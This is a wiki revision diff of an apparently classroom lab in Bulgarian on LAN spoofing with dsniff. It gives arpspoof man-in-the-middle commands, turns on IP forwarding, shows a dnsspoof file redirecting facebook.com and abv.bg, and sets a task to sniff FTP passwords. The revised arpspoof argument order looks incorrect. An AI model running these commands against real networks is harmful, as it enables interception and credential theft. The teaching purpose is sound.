Difference between revisions of "Spoofing"

From Ilianko
Line 36: Line 36:
 
== arpspoof ==
 
== arpspoof ==
  
Пренасочване на трафика през вашата машина:
+
Пренасочване на трафика през вашата машина.
 
   
 
   
 
victim - машината, която ще се подслушва
 
victim - машината, която ще се подслушва
 
gateway - gateway на мрежата
 
gateway - gateway на мрежата
 +
 +
Задачата да се изпълни по двама (на два компютъра).
 +
 +
Victim ще бъде потребител на първия компютър. Ще отваря различни страници
 +
 +
На вторият компютър ще има стартиран виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump, с негова помощ ще се сканира Wireshark ще бъде стартиран през хоста
  
 
стартиране на  
 
стартиране на  
  $arpspoof -t victim gateway
+
  $arpspoof victim -t gateway
  $arpspoof -t gateway victim
+
  $arpspoof gateway -t victim
  
 
Включване на  IP forwarding, иначе жертвата ще загуби свързаност
 
Включване на  IP forwarding, иначе жертвата ще загуби свързаност

Revision as of 08:50, 17 October 2015

dsniff

dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"

Включени инструменти:

  • arpspoof - Send out unrequested (and possibly forged) arp replies.
  • dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
  • dsniff - password sniffer for several protocols.

filesnarf - saves selected files sniffed from NFS traffic.

macof - flood the local network with random MAC addresses.

mailsnarf - sniffs mail on the LAN and stores it in mbox format.

msgsnarf - record selected messages from different Instant Messengers.

sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.

sshow - SSH traffic analyser.

tcpkill - kills specified in-progress TCP connections.

tcpnice - slow down specified TCP connections via "active" traffic shaping.

urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.

webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.

webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

Инсталация:

:~$ apt-get install dsniff

arpspoof

Пренасочване на трафика през вашата машина.

victim - машината, която ще се подслушва gateway - gateway на мрежата

Задачата да се изпълни по двама (на два компютъра).

Victim ще бъде потребител на първия компютър. Ще отваря различни страници

На вторият компютър ще има стартиран виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump, с негова помощ ще се сканира Wireshark ще бъде стартиран през хоста

стартиране на

$arpspoof victim -t gateway
$arpspoof gateway -t victim

Включване на IP forwarding, иначе жертвата ще загуби свързаност

$echo 1 > /proc/sys/net/ipv4/ip_forward

Стартирайте wireshark и проверете дали атаката има успех

dnsspoof

1. Създайте веб сървър.


2. Конфигурирайте с домайните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.

Създаване на файл.

~$nano host.new 

Примерно съдържание.

172.16.16.165 *.facebook.com
172.16.16.165 *.abv.bg

2. Стартирайте на програмата като администратор

~$dnsspoof -f host.new


След стартиране програмата слуша за dns запитвания.

dsniff

Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата

mailsnarf